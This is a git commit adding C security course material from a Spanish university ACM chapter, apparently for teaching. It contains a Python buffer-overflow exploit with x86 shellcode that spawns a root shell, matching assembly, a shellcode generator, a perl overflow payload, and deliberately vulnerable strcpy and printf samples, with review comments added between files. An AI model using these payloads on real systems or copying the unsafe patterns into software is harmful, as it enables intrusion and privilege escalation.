authorGuillermo Ramos2013-05-27 00:07:01 +0200
committerGuillermo Ramos2013-05-27 00:07:01 +0200
commit45ec0c7e1bfd251e13f4d3ade89785e98df31ba9 (patch)
tree1f9b534ed4ea650517c39799f5e2aed0885ce87d
downloadacm-45ec0c7e1bfd251e13f4d3ade89785e98df31ba9.tar.gz
-rw-r--r--c_seguridad/code/bof/.chuleta.txt1
-rw-r--r--c_seguridad/code/bof/exit.asm8
-rwxr-xr-xc_seguridad/code/bof/exploit.py23
-rw-r--r--c_seguridad/code/bof/exploitable.c14
-rw-r--r--c_seguridad/code/bof/shellcode1
-rwxr-xr-xc_seguridad/code/bof/shellcodeGen/shellcodeGen.c73
-rw-r--r--c_seguridad/code/bof/shellex.asm25
-rw-r--r--c_seguridad/code/bof/test.c15
-rw-r--r--c_seguridad/code/formatst/ejemplodospuntoce.c7
-rw-r--r--c_seguridad/code/formatst/ejemplotrespuntoce.c7
-rw-r--r--c_seguridad/code/stack/ejemplounopuntoce.c10
-rw-r--r--c_seguridad/code/stack/stack.c9
-rw-r--r--c_seguridad/code/strcmp.c19
-rw-r--r--c_seguridad/present/acm.pngbin0 -> 31509 bytes
-rw-r--r--c_seguridad/present/beamerthemeACM.sty68
-rw-r--r--c_seguridad/present/cabecera.pngbin0 -> 2441974 bytes
-rw-r--r--c_seguridad/present/img/Nuclear-Explosion.jpgbin0 -> 538568 bytes
-rw-r--r--c_seguridad/present/img/bof1.pngbin0 -> 22232 bytes
-rw-r--r--c_seguridad/present/img/bof2.pngbin0 -> 20587 bytes
-rw-r--r--c_seguridad/present/img/dudas.jpgbin0 -> 4182 bytes
-rw-r--r--c_seguridad/present/img/dudewtf.pngbin0 -> 53473 bytes
-rw-r--r--c_seguridad/present/img/hacker.jpgbin0 -> 890989 bytes
-rw-r--r--c_seguridad/present/img/memoria_virtual.pngbin0 -> 22243 bytes
-rw-r--r--c_seguridad/present/img/memory_org.pngbin0 -> 32880 bytes
-rw-r--r--c_seguridad/present/img/nuclear_explosion.pngbin0 -> 2228596 bytes
-rw-r--r--c_seguridad/present/img/ordenadorbob.jpgbin0 -> 352973 bytes
-rw-r--r--c_seguridad/present/img/showmethecode.pngbin0 -> 1049346 bytes
-rw-r--r--c_seguridad/present/img/smith.pngbin0 -> 828008 bytes
-rw-r--r--c_seguridad/present/img/stack_call_struct.pngbin0 -> 57091 bytes
-rw-r--r--c_seguridad/present/img/stack_frame_struct.pngbin0 -> 30790 bytes
-rw-r--r--c_seguridad/present/img/stack_overflow.pngbin0 -> 31297 bytes
-rw-r--r--c_seguridad/present/img/stack_overflow_1.pngbin0 -> 31307 bytes
-rw-r--r--c_seguridad/present/img/stack_overflow_2.pngbin0 -> 31234 bytes
-rw-r--r--c_seguridad/present/seguridad.tex280
-rw-r--r--git/present/Makefile5
-rw-r--r--git/present/acm.pngbin0 -> 31509 bytes
-rw-r--r--git/present/beamerthemeACM.sty68
-rw-r--r--git/present/cabecera.pngbin0 -> 2441974 bytes
-rw-r--r--git/present/git.tex95
-rw-r--r--git/present/img/dudas.jpgbin0 -> 4182 bytes
-rw-r--r--git/present/img/gitlocal.pngbin0 -> 66869 bytes
-rw-r--r--git/present/img/gitremote.pngbin0 -> 44064 bytes
-rw-r--r--git/present/img/reference.pngbin0 -> 1269745 bytes
43 files changed, 728 insertions, 0 deletions
diff --git a/c_seguridad/code/bof/.chuleta.txt b/c_seguridad/code/bof/.chuleta.txt
new file mode 100644
index 0000000..b5ddbf3
--- /dev/null
+++ b/c_seguridad/code/bof/.chuleta.txt
@@ -0,0 +1 @@
+Exploitable (repetir función): perl -e 'print "A"x72 . "\xd4\x83\x04\x08"'
diff --git a/c_seguridad/code/bof/exit.asm b/c_seguridad/code/bof/exit.asm
new file mode 100644
index 0000000..1ee5f18
--- /dev/null
+++ b/c_seguridad/code/bof/exit.asm
@@ -0,0 +1,8 @@
+SECTION .text
+global _start
+_start:
+ xor eax, eax
+ mov al, 1
+ xor ebx, ebx
+ mov bl, 123
+ int 0x80
diff --git a/c_seguridad/code/bof/exploit.py b/c_seguridad/code/bof/exploit.py
new file mode 100755
index 0000000..5219755
--- /dev/null
+++ b/c_seguridad/code/bof/exploit.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+
+from time import sleep
+from os import system
+
+
+shellcode = (
+ # Buffer offset
+ "\x90"*17 +
+
+ # Shellcode (55 chars)
+ "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+ "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+ "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+ "\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
+
+ "\xf8\xf7\xff\xbf"
+ )
+
+cmd = "./exploitable " + shellcode
+
+print shellcode
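Review bot: `cmd` is assigned on the line before the final `print` and never used, and the two imports at the top (`from time import sleep`, `from os import system`) are also unused, so the script suggests it runs the target when it only prints the string. Those three lines can be dropped. The trailing four bytes `"\xf8\xf7\xff\xbf"` have no comment, unlike the two parts above them; a line such as `# Overwritten return address (specific to the demo machine's stack layout)` would tell a reader why the value cannot be expected to hold on any other system.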
diff --git a/c_seguridad/code/bof/exploitable.c b/c_seguridad/code/bof/exploitable.c
new file mode 100644
index 0000000..5492a29
--- /dev/null
+++ b/c_seguridad/code/bof/exploitable.c
@@ -0,0 +1,14 @@
+#include <string.h>
+#include <stdio.h>
+
+void vulnerable(char* str) {
+ printf("Entrando en vulnerable...\n");
+ char arr[60];
+ strcpy(arr, str);
+}
+
+int main(int argc, char** argv) {
+ if (argc > 1)
+ vulnerable(*(argv+1));
+ return 0;
+}
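Review bot: `strcpy(arr, str)` in `vulnerable()` copies an argument of any length into the 60-byte `arr`, and nothing in the file says that this is deliberate. Since this is course material, a header comment such as `/* Deliberately unsafe: the copy is not bounded by sizeof arr. Teaching sample, do not reuse. */` would keep it from being copied as a pattern. It would also help to show the bounded form next to it, the way the formatst pair shows broken and fixed side by side: `snprintf(arr, sizeof arr, "%s", str);`.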
diff --git a/c_seguridad/code/bof/shellcode b/c_seguridad/code/bof/shellcode
new file mode 100644
index 0000000..e36a2c5
--- /dev/null
+++ b/c_seguridad/code/bof/shellcode
@@ -0,0 +1 @@
+1À°F1Û1ÉÍ€ë1À[ˆC‰[‰C ° KS Í€èåÿÿÿ/bin/shNAAAABBBBø÷ÿ¿
diff --git a/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
new file mode 100755
index 0000000..0221f48
--- /dev/null
+++ b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
@@ -0,0 +1,73 @@
+/**
+ *
+ * BlackLight's shellcode generator for Linux x86
+ * Tested anywhere, working & NULL-free
+ *
+ * Usage: ./generator <cmd>
+ * ...and then you've got a ready2inject NULL-free shellcode for the command you like
+ *
+ * copyleft 2008 by BlackLight <blacklight[at]autistici.org>
+ * < http://blacklight.gotdns.org >
+ *
+ * Released under GPL v.3 licence
+ *
+ * Greetz to: evilsocket, for the idea he gave me ;)
+ * Greetz to: my friends, who tested, used and appreciated this code and helped
+ * me to improve it to what it is now
+ * Greetz to: my girl, next to me in any moment even if she had no idea
+ * about what I was doing ^^
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+char code[] =
+ "\\x60" /*pusha*/
+ "\\x31\\xc0" /*xor %eax,%eax*/
+ "\\x31\\xd2" /*xor %edx,%edx*/
+ "\\xb0\\x0b" /*mov $0xb,%al*/
+ "\\x52" /*push %edx*/
+ "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/
+ "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/
+ "\\x89\\xe3" /*mov %esp,%ebx*/
+ "\\x52" /*push %edx*/
+ "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/
+ "\\x89\\xe1" /*mov %esp,%ecx*/
+ "\\x52" /*push %edx*/
+ "\\xeb\\x07" /*jmp 804839a <cmd>*/
+ "\\x51" /*push %ecx*/
+ "\\x53" /*push %ebx*/
+ "\\x89\\xe1" /*mov %esp,%ecx*/
+ "\\xcd\\x80" /*int $0x80*/
+ "\\x61" /*popa*/
+ "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 <l1>*/;
+
+int main (int argc, char **argv) {
+ int i,len=0;
+ char *shell,*cmd;
+
+ if (!argv[1])
+ exit(1);
+
+ for (i=1; i<argc; i++)
+ len += strlen(argv[i]);
+ len += argc;
+
+ cmd = (char*) malloc(len);
+
+ for (i=1; i<argc; i++) {
+ strcat (cmd,argv[i]);
+ strcat (cmd,"\x20");
+ }
+
+ cmd[strlen(cmd)-1]=0;
+ shell = (char*) malloc( sizeof(code) + (strlen(argv[1]))*5 + 1 );
+ memcpy (shell,code,sizeof(code));
+
+ for (i=0; i<strlen(cmd); i++)
+ sprintf (shell,"%s\\x%.2x",shell,cmd[i]);
+ printf ("%s\n",shell);
+}
+
+// milw0rm.com [2008-08-19] \ No newline at end of file
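Review bot: `cmd` comes from `malloc(len)` and is handed to `strcat` without being initialised, so the first append scans indeterminate bytes for a terminator; `cmd = calloc(len, 1);` (or `cmd[0] = '\0';` after a NULL check) fixes that. The `shell` buffer is sized from `strlen(argv[1])` although the loop runs over `strlen(cmd)`, which is all arguments joined, and a negative `cmd[i]` is sign-extended before `%.2x` and prints more than two digits; sizing from `strlen(cmd)` and passing `(unsigned char)cmd[i]` would bound the output. `sprintf(shell, "%s\\x%.2x", shell, cmd[i])` uses the destination as one of its sources, which is undefined; writing at a tracked offset with `snprintf` avoids that. Neither `malloc` result is checked. The file is a third-party copy, so these may be better recorded in a comment or reported upstream than patched silently.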
diff --git a/c_seguridad/code/bof/shellex.asm b/c_seguridad/code/bof/shellex.asm
new file mode 100644
index 0000000..00968ea
--- /dev/null
+++ b/c_seguridad/code/bof/shellex.asm
@@ -0,0 +1,25 @@
+SECTION .text
+global _start
+_start:
+ xor eax, eax
+ mov al, 70
+ xor ebx, ebx
+ xor ecx, ecx
+ int 0x80
+
+ jmp short ender
+
+starter:
+ xor eax, eax
+ pop ebx
+ mov [ebx+7], al
+ mov [ebx+8], ebx
+ mov [ebx+12], eax
+ mov al, 11
+ lea ecx, [ebx+8]
+ lea edx, [ebx+12]
+ int 0x80
+
+ender:
+ call starter
+ db "/bin/shNAAAABBBB"
diff --git a/c_seguridad/code/bof/test.c b/c_seguridad/code/bof/test.c
new file mode 100644
index 0000000..c88c260
--- /dev/null
+++ b/c_seguridad/code/bof/test.c
@@ -0,0 +1,15 @@
+char shellcode[] =
+"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";
+
+//char shellcode[] =
+//"\x31\xc0\xb0\x01\x31\xdb\xb3\x7b\xcd\x80";
+
+
+int main() {
+ int (*func)();
+ func = (int (*)()) shellcode;
+ (*func)();
+}
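Review bot: `main` converts the address of the `shellcode` array to a function pointer and calls it, which ISO C does not define, and the file has no comment saying what the harness is for or what it depends on. On a system that maps data pages non-executable the call faults instead of running the bytes, which is the mitigation doing its job; a comment like `/* Harness: jumps into shellcode[]. Faults where data pages are non-executable (NX/W^X). */` would make that explicit for students. The commented-out alternative array should be deleted or moved to its own file, and `int main()` is better written `int main(void)`.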
diff --git a/c_seguridad/code/formatst/ejemplodospuntoce.c b/c_seguridad/code/formatst/ejemplodospuntoce.c
new file mode 100644
index 0000000..6f7f181
--- /dev/null
+++ b/c_seguridad/code/formatst/ejemplodospuntoce.c
@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main(int argc, char** argv) {
+ if (argc > 1)
+ printf(argv[1]);
+ return 0;
+}
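Review bot: `printf(argv[1])` passes a command-line argument as the format string, and the file gives no sign that it is the intentionally broken half of the pair with ejemplotrespuntoce.c. A comment above the call, e.g. `/* UNSAFE on purpose: argv[1] is interpreted as a format string; see ejemplotrespuntoce.c for the fix */`, would keep it from being mistaken for working code. Building the samples with `-Wformat -Wformat-security` also lets students see the compiler diagnostic for this exact line.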
diff --git a/c_seguridad/code/formatst/ejemplotrespuntoce.c b/c_seguridad/code/formatst/ejemplotrespuntoce.c
new file mode 100644
index 0000000..8e49d87
--- /dev/null
+++ b/c_seguridad/code/formatst/ejemplotrespuntoce.c
@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main(int argc, char** argv) {
+ if (argc > 1)
+ printf("%s", argv[1]);
+ return 0;
+}
diff --git a/c_seguridad/code/stack/ejemplounopuntoce.c b/c_seguridad/code/stack/ejemplounopuntoce.c
new file mode 100644
index 0000000..4d2425e
--- /dev/null
+++ b/c_seguridad/code/stack/ejemplounopuntoce.c
@@ -0,0 +1,10 @@
+#include <stdlib.h>
+
+char global;
+float pi = 3.14;
+
+int main() {
+ int local;
+ char* buffer = (char*)malloc(20);
+ return 0;
+}
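Review bot: The `buffer` returned by `malloc(20)` in `main` is neither checked nor freed, and the segment labels that the slides attach to each line (`// bss`, `// data`, `// stack`, `// heap`) are missing from the source file itself. Adding those comments and a `free(buffer);` before `return 0;` keeps the sample consistent with seguridad.tex without changing what it demonstrates. The cast on `malloc` is unnecessary in C, and `3.14` is a `double` literal, so `3.14f` states the intent for a `float`.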
diff --git a/c_seguridad/code/stack/stack.c b/c_seguridad/code/stack/stack.c
new file mode 100644
index 0000000..2987356
--- /dev/null
+++ b/c_seguridad/code/stack/stack.c
@@ -0,0 +1,9 @@
+#include <stdlib.h>
+
+int global = 0x11111111;
+
+int main() {
+ int local = 0x22222222;
+ char buffer[] = "AAAABBBBCCCCDDD";
+ return 0;
+}
diff --git a/c_seguridad/code/strcmp.c b/c_seguridad/code/strcmp.c
new file mode 100644
index 0000000..23ab60a
--- /dev/null
+++ b/c_seguridad/code/strcmp.c
@@ -0,0 +1,19 @@
+#include <stdio.h>
+#include <string.h>
+
+int main() {
+ char str1[] = "aaaa";
+ char str2[] = "aaaa";
+
+ if (strcmp(str1, str2) == 0)
+ printf("strcmp: Son iguales\n");
+ else
+ printf("strcmp: No son iguales\n");
+
+ if (str1 == str2)
+ printf("==: Son iguales\n");
+ else
+ printf("==: No son iguales\n");
+
+ return 0;
+}
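Review bot: The second test, `if (str1 == str2)`, compares the addresses of two distinct arrays and is therefore always false, but the file has no comment saying that this is the point of the example. A line such as `/* == compares the addresses of the arrays, not their contents */` above it would do. Compilers may warn about this comparison; if the course build shows that warning, the comment should say it is expected.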
diff --git a/c_seguridad/present/acm.png b/c_seguridad/present/acm.png
new file mode 100644
index 0000000..f083d8c
--- /dev/null
+++ b/c_seguridad/present/acm.png
Binary files differ
diff --git a/c_seguridad/present/beamerthemeACM.sty b/c_seguridad/present/beamerthemeACM.sty
new file mode 100644
index 0000000..0d0e790
--- /dev/null
+++ b/c_seguridad/present/beamerthemeACM.sty
@@ -0,0 +1,68 @@
+\usetheme{Rochester}
+
+\RequirePackage{pgf}
+
+\pgfdeclareimage[width=1.0\paperwidth]{cabecera}{cabecera}
+
+\setbeamertemplate{blocks}[rounded][shadow=true]
+\setbeamercovered{transparent}
+
+\beamer@headheight=0.14\paperwidth
+
+\definecolor{oxygenorange}{HTML}{F7800A}
+\definecolor{oxygengray}{HTML}{686868}
+\definecolor{oxygenlightgray}{HTML}{EEEEEE}
+\definecolor{oxygenblue}{HTML}{236EAF}
+\setbeamercolor*{Title bar}{fg=white}
+\setbeamercolor*{Location bar}{fg=oxygenorange,bg=oxygenlightgray}
+\setbeamercolor*{frametitle}{parent=Title bar}
+\setbeamercolor*{block title}{bg=oxygenblue,fg=white}
+\setbeamercolor*{block body}{bg=oxygenlightgray,fg=oxygengray}
+\setbeamercolor*{normal text}{bg=white,fg=oxygengray}
+\setbeamercolor*{section in head/foot}{bg=oxygenblue,fg=white}
+
+\usecolortheme[named=oxygenorange]{structure}
+
+\setbeamerfont{section in head/foot}{size=\tiny,series=\normalfont}
+\setbeamerfont{frametitle}{size=\Large}
+
+%\setbeamertemplate{headline}
+\setbeamertemplate{frametitle}
+{
+ \vskip-0.25\beamer@headheight
+ \vskip-\baselineskip
+ \vskip-0.2cm
+ \hskip0.7cm\usebeamerfont*{frametitle}\insertframetitle
+ \vskip-0.10em
+ \hskip0.7cm\usebeamerfont*{framesubtitle}\insertframesubtitle
+}
+
+\setbeamertemplate{headline}
+{
+ \pgfuseimage{cabecera}
+ \vskip -1.95cm
+ \linethickness{0.0pt}
+
+ \framelatex{
+ \begin{beamercolorbox}[wd=\paperwidth,ht=0.3\beamer@headheight]{Title bar}
+ \usebeamerfont{section in head/foot}%
+ %\insertsectionnavigationhorizontal{0pt}{\hskip0.22cm}{}%
+ \end{beamercolorbox}}
+
+ \framelatex{
+ \begin{beamercolorbox}[wd=\paperwidth,ht=0.7\beamer@headheight]{Title bar}
+ \end{beamercolorbox}}
+}
+
+\setbeamertemplate{footline}
+{
+ \linethickness{0.25pt}
+ \framelatex{
+ \begin{beamercolorbox}[leftskip=.3cm,wd=\paperwidth,ht=0.3\beamer@headheight,sep=0.1cm]{Location bar}
+ \usebeamerfont{section in head/foot}%
+ \insertshortauthor~|~\insertshorttitle
+ \hfill
+ \insertframenumber/\inserttotalframenumber
+ \end{beamercolorbox}}
+}
+
diff --git a/c_seguridad/present/cabecera.png b/c_seguridad/present/cabecera.png
new file mode 100644
index 0000000..5c2f81c
--- /dev/null
+++ b/c_seguridad/present/cabecera.png
Binary files differ
diff --git a/c_seguridad/present/img/Nuclear-Explosion.jpg b/c_seguridad/present/img/Nuclear-Explosion.jpg
new file mode 100644
index 0000000..f68597c
--- /dev/null
+++ b/c_seguridad/present/img/Nuclear-Explosion.jpg
Binary files differ
diff --git a/c_seguridad/present/img/bof1.png b/c_seguridad/present/img/bof1.png
new file mode 100644
index 0000000..3b25c5e
--- /dev/null
+++ b/c_seguridad/present/img/bof1.png
Binary files differ
diff --git a/c_seguridad/present/img/bof2.png b/c_seguridad/present/img/bof2.png
new file mode 100644
index 0000000..390d2a4
--- /dev/null
+++ b/c_seguridad/present/img/bof2.png
Binary files differ
diff --git a/c_seguridad/present/img/dudas.jpg b/c_seguridad/present/img/dudas.jpg
new file mode 100644
index 0000000..3a5599c
--- /dev/null
+++ b/c_seguridad/present/img/dudas.jpg
Binary files differ
diff --git a/c_seguridad/present/img/dudewtf.png b/c_seguridad/present/img/dudewtf.png
new file mode 100644
index 0000000..7f1b30c
--- /dev/null
+++ b/c_seguridad/present/img/dudewtf.png
Binary files differ
diff --git a/c_seguridad/present/img/hacker.jpg b/c_seguridad/present/img/hacker.jpg
new file mode 100644
index 0000000..986d05a
--- /dev/null
+++ b/c_seguridad/present/img/hacker.jpg
Binary files differ
diff --git a/c_seguridad/present/img/memoria_virtual.png b/c_seguridad/present/img/memoria_virtual.png
new file mode 100644
index 0000000..97f14f9
--- /dev/null
+++ b/c_seguridad/present/img/memoria_virtual.png
Binary files differ
diff --git a/c_seguridad/present/img/memory_org.png b/c_seguridad/present/img/memory_org.png
new file mode 100644
index 0000000..17a9f0a
--- /dev/null
+++ b/c_seguridad/present/img/memory_org.png
Binary files differ
diff --git a/c_seguridad/present/img/nuclear_explosion.png b/c_seguridad/present/img/nuclear_explosion.png
new file mode 100644
index 0000000..098dccc
--- /dev/null
+++ b/c_seguridad/present/img/nuclear_explosion.png
Binary files differ
diff --git a/c_seguridad/present/img/ordenadorbob.jpg b/c_seguridad/present/img/ordenadorbob.jpg
new file mode 100644
index 0000000..479521c
--- /dev/null
+++ b/c_seguridad/present/img/ordenadorbob.jpg
Binary files differ
diff --git a/c_seguridad/present/img/showmethecode.png b/c_seguridad/present/img/showmethecode.png
new file mode 100644
index 0000000..5ffd815
--- /dev/null
+++ b/c_seguridad/present/img/showmethecode.png
Binary files differ
diff --git a/c_seguridad/present/img/smith.png b/c_seguridad/present/img/smith.png
new file mode 100644
index 0000000..ee7b3fe
--- /dev/null
+++ b/c_seguridad/present/img/smith.png
Binary files differ
diff --git a/c_seguridad/present/img/stack_call_struct.png b/c_seguridad/present/img/stack_call_struct.png
new file mode 100644
index 0000000..7d61f4c
--- /dev/null
+++ b/c_seguridad/present/img/stack_call_struct.png
Binary files differ
diff --git a/c_seguridad/present/img/stack_frame_struct.png b/c_seguridad/present/img/stack_frame_struct.png
new file mode 100644
index 0000000..adf21d3
--- /dev/null
+++ b/c_seguridad/present/img/stack_frame_struct.png
Binary files differ
diff --git a/c_seguridad/present/img/stack_overflow.png b/c_seguridad/present/img/stack_overflow.png
new file mode 100644
index 0000000..1f33d35
--- /dev/null
+++ b/c_seguridad/present/img/stack_overflow.png
Binary files differ
diff --git a/c_seguridad/present/img/stack_overflow_1.png b/c_seguridad/present/img/stack_overflow_1.png
new file mode 100644
index 0000000..25f5415
--- /dev/null
+++ b/c_seguridad/present/img/stack_overflow_1.png
Binary files differ
diff --git a/c_seguridad/present/img/stack_overflow_2.png b/c_seguridad/present/img/stack_overflow_2.png
new file mode 100644
index 0000000..0963203
--- /dev/null
+++ b/c_seguridad/present/img/stack_overflow_2.png
Binary files differ
diff --git a/c_seguridad/present/seguridad.tex b/c_seguridad/present/seguridad.tex
new file mode 100644
index 0000000..1a422fa
--- /dev/null
+++ b/c_seguridad/present/seguridad.tex
@@ -0,0 +1,280 @@
+% vim : tabstop 4
+%%%%%%%%%%%%%%%%%%%%
+% seguridad.tex - Transparencias de la sección de Seguridad del Curso de C
+% Guillermo Ramos Gutiérrez <wille@acm.asoc.fi.upm.es>
+%%%%%%%%%%%%%%%%%%%%%
+
+\documentclass{beamer}
+
+\mode<presentation>
+{
+ \usetheme{ACM}
+ \setbeamercovered{transparent}
+}
+
+\usepackage[spanish]{babel}
+\usepackage[utf8]{inputenc}
+\usepackage{times}
+\usepackage{color}
+
+\title[Curso de C: Seguridad]
+{Curso de C: Seguridad}
+
+\author[Guillermo Ramos]
+{
+Guillermo Ramos \\
+\texttt{wille@acm.asoc.fi.upm.es}
+}
+
+\institute[ACM FI - UPM]
+{
+ACM Facultad de Informática \\
+Universidad Politécnica de Madrid
+}
+
+\date{24 de marzo de 2011}
+
+\pgfdeclareimage[height=0.7cm]{acm-logo}{acm}
+\logo{\pgfuseimage{acm-logo}}
+
+\AtBeginSection[]
+{
+ \begin{frame}<beamer>
+ \frametitle{Contenido}
+ \tableofcontents[currentsection]
+ \end{frame}
+}
+
+\begin{document}
+
+ \begin{frame}
+ \titlepage
+ \end{frame}
+
+ \begin{frame}{Contenido}
+ \tableofcontents
+ \end{frame}
+
+ \section{¿De qué va todo esto?}
+ \begin{frame}{}
+ \begin{center}
+ \textbf{\huge 01010000}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{}
+ \begin{center}
+ \textbf{\huge 01010001} \\
+ \vspace{1cm}
+ \uncover<1>{¿0x50?} \\
+ \uncover<2>{¿push eax?} \\
+ \uncover<3>{¿true?}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{}
+ \begin{center}
+ \textbf{\huge 01010000} \\
+ \vspace{1cm}
+ $\surd$ 0x50 \\
+ $\surd$ push eax \\
+ $\surd$ true
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{}
+ \begin{center}
+ \includegraphics[width=3cm]{img/dudewtf.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{En resumen}
+ \begin{itemize}
+ \item Problema: \textbf{distinguir datos de código}
+ \item La información no tiene más significado que el que le da un proceso.
+ \item Esto se suele aprovechar para controlar los fallos de software y modificar el flujo de ejecución.
+ \end{itemize}
+ \end{frame}
+
+
+ \section{Memoria}
+ \subsection{Memoria Virtual}
+ \begin{frame}{Memoria Virtual}
+ \begin{center}
+ \includegraphics[width=6cm]{img/memoria_virtual.png}
+ \end{center}
+ \end{frame}
+
+ \subsection{Organización de memoria}
+ \begin{frame}{Organización de memoria}
+ \begin{center}
+ \includegraphics[width=6cm]{img/memory_org.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Ejemplo}
+ \begin{center}
+ \begin{block}{ejemplounopuntocé.c}
+ char global; \\
+ float pi = 3.14; \\[3mm]
+ int main() \{ \\
+ \hspace{1cm}int local; \\
+ \hspace{1cm}char* buffer = (char*)malloc(20); \\
+ \hspace{1cm}return 0; \\
+ \}
+ \end{block}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Ejemplo}
+ \begin{center}
+ \begin{block}{ejemplounopuntocé.c}
+ char global; \textcolor{red}{// bss} \\
+ float pi = 3.14; \textcolor{red}{// data} \\[3mm]
+ int main() \{ \textcolor{red}{// code} \\
+ \hspace{1cm}int local; \textcolor{red}{// stack} \\
+ \hspace{1cm}char* buffer = (char*)malloc(20); \textcolor{red}{// heap (*buffer)} \\
+ \hspace{1cm}return 0; \\
+ \}
+ \end{block}
+ \end{center}
+ \end{frame}
+
+ \subsection{La pila}
+ \begin{frame}{La pila}
+ Guarda el estado de las funciones en \textbf{marcos de pila} \\
+ Cada marco de pila almacena:
+ \begin{itemize}
+ \item Parámetros
+ \item Variables locales
+ \item Dirección de retorno de la función
+ \end{itemize}
+ \end{frame}
+
+ \begin{frame}{El marco de pila}
+ \begin{center}
+ \includegraphics[width=6cm]{img/stack_frame_struct.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{La pila}
+ \begin{center}
+ \includegraphics[width=6cm]{img/stack_call_struct.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Ejemplos}
+ \begin{center}
+ \includegraphics[width=6cm]{img/showmethecode.png}
+ \end{center}
+ \end{frame}
+
+
+ \section{Buffer Overflows}
+ \begin{frame}{Introducción}
+ \begin{center}
+ \textit{At first I was like...} \\[3mm]
+ \includegraphics[width=8cm]{img/bof1.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Introducción}
+ \begin{center}
+ \textit{... but then I was like...} \\[3mm]
+ \includegraphics[width=7cm]{img/nuclear_explosion.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Introducción}
+ \begin{center}
+ Un buffer overflow ocurre cuando no se controla la cantidad de datos que se pueden
+ copiar en un buffer y se sigue escribiendo tras haberlo rellenado, provocando
+ la sobreescritura de la memoria adyacente a él. \\[3mm]
+ \includegraphics[width=6cm]{img/bof2.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Introducción}
+ \begin{center}
+ \includegraphics[width=8cm]{img/stack_overflow_1.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Introducción}
+ \begin{center}
+ \includegraphics[width=8cm]{img/stack_overflow_2.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Introducción}
+ \begin{center}
+ \includegraphics[width=8cm]{img/stack_overflow.png}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Ejemplos}
+ \begin{center}
+ \includegraphics[width=6cm]{img/showmethecode.png}
+ \end{center}
+ \end{frame}
+
+
+ \section{Format Strings}
+ \begin{frame}{Introducción}
+ \begin{center}
+ \begin{block}{ejemplodospuntocé.c}
+ int main(int argc, char** argv) \{ \\
+ \hspace{1cm}if (argc $>$ 1) \\
+ \hspace{2cm}printf(argv[1]); \\
+ \hspace{1cm}return 0; \\
+ \}
+ \end{block}
+ \begin{block}{ejemplotrespuntocé.c}
+ int main(int argc, char** argv) \{ \\
+ \hspace{1cm}if (argc $>$ 1) \\
+ \hspace{2cm}printf("\%s", argv[1]); \\
+ \hspace{1cm}return 0; \\
+ \}
+ \end{block}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x}
+ \begin{center}
+ Un ataque de format strings es una inyección de caracteres que hace que printf() o cualquier
+ derivado interprete que debe insertar parámetros en la salida. Al no haberlos, usa memoria
+ de la pila.
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{Ejemplos}
+ \begin{center}
+ \includegraphics[width=6cm]{img/showmethecode.png}
+ \end{center}
+ \end{frame}
+
+
+ \section{}
+ \begin{frame}{}
+ \begin{center}
+ ¿Dudas, preguntas? \\
+ \includegraphics[width=5cm]{img/dudas.jpg}
+ \end{center}
+ \end{frame}
+
+ \begin{frame}{}
+ \textbf{Bibliografía recomendada:}
+ \begin{thebibliography}{99}
+ \bibitem{} \htmladdnormallink{Erickson, J. (2008). \textit{The Art of Exploitation, 2nd Edition}}{http://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/}
+ \bibitem{} \htmladdnormallink{Anley, C., Heasman, J., Lindner, F., Richarte, G. (2007). \textit{The Shellcoder's
+ Handbook: Discovering and Exploiting Security Holes}}{http://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X/}
+ \end{thebibliography}
+ \end{frame}
+
+ \begin{frame}{}
+ \begin{center}
+ \textbf{¡Gracias por venir!}
+ \end{center}
+ \end{frame}
+
+\end{document}
diff --git a/git/present/Makefile b/git/present/Makefile
new file mode 100644
index 0000000..0fa5dda
--- /dev/null
+++ b/git/present/Makefile
@@ -0,0 +1,5 @@
+quick:
+ pdflatex git.tex
+
+release: quick
+ pdflatex git.tex
diff --git a/git/present/acm.png b/git/present/acm.png
new file mode 100644
index 0000000..f083d8c
--- /dev/null
+++ b/git/present/acm.png
Binary files differ
diff --git a/git/present/beamerthemeACM.sty b/git/present/beamerthemeACM.sty
new file mode 100644
index 0000000..0d0e790
--- /dev/null
